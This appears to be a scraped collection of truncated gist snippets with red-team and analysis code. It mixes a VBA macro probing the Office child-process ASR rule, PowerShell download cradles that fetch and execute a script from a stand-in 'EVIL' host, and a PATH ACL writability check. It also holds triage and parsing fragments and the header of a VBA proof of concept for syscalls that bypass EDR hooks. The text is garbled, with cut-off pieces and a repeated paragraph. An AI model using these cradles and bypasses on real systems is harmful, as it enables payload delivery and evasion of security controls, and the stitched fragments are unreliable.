Each of these commands will run an ad hoc static HTTP server in your current (or specified) directory, available at http://localhost:8000. Note that by default the server binds to all interfaces, so the directory is also reachable from other hosts on the network for as long as it runs. Use this power wisely.
$ python -m SimpleHTTPServer 8000
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked()
    ' Probe for the "Office applications creating child processes" ASR rule:
    ' ask the WScript.Shell automation object to start cmd.exe and observe
    ' whether the launch is allowed or blocked (see the links above).
    Dim launcher As Object
    Set launcher = CreateObject("Wscript.Shell")
    Call launcher.Run("cmd.exe")
End Sub
Each of these commands will run an ad hoc static HTTP server in your current (or specified) directory, available at http://localhost:8000. Note that by default the server binds to all interfaces, so the directory is also reachable from other hosts on the network for as long as it runs. Use this power wisely.
$ python -m SimpleHTTPServer 8000
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
Break | |
} | |
$outfile = "acltestfile" | |
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
Foreach ($path in $paths) { | |
# This prints a table of ACLs | |
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
filter Get-AppPackageTriageInfo { | |
<# | |
.SYNOPSIS | |
A tool to perform rapid triage of decompressed application packages (.msix and .appx files). | |
.DESCRIPTION | |
Get-AppPackageTriageInfo parses key information from an uncompressed application package (.msix and .appx) without needing to first install it. |
#def _tokenize(code, comments, comment_strings, containers): | |
# """ | |
# tokenizes sources code to find hardcoded strings | |
# returns list of hardcoded strings | |
# """ | |
# string = container = comment_end = '' | |
# state = 'look' | |
# skip = 0 | |
# comment = False | |
# all_strings = [] |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
from __future__ import print_function | |
import os | |
import sys | |
try: | |
import olefile |
#!/usr/bin/env python | |
import os | |
import shlex | |
import struct | |
import platform | |
import subprocess | |
def get_terminal_size(): | |
""" getTerminalSize() |
def crc16(data: bytes, poly=0x8408): | |
''' | |
CRC-16-CCITT Algorithm | |
''' | |
data = bytearray(data) | |
crc = 0xFFFF | |
for b in data: | |
cur_byte = 0xFF & b | |
for _ in range(0, 8): | |
if (crc & 0x0001) ^ (cur_byte & 0x0001): |
' Proof of Concept: retrieving SSN for syscalling in VBA | |
' Author: Juan Manuel Fernandez (@TheXC3LL) | |
'Based on: | |
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | |
'https://www.crummie5.club/freshycalls/ | |
Private Type LARGE_INTEGER |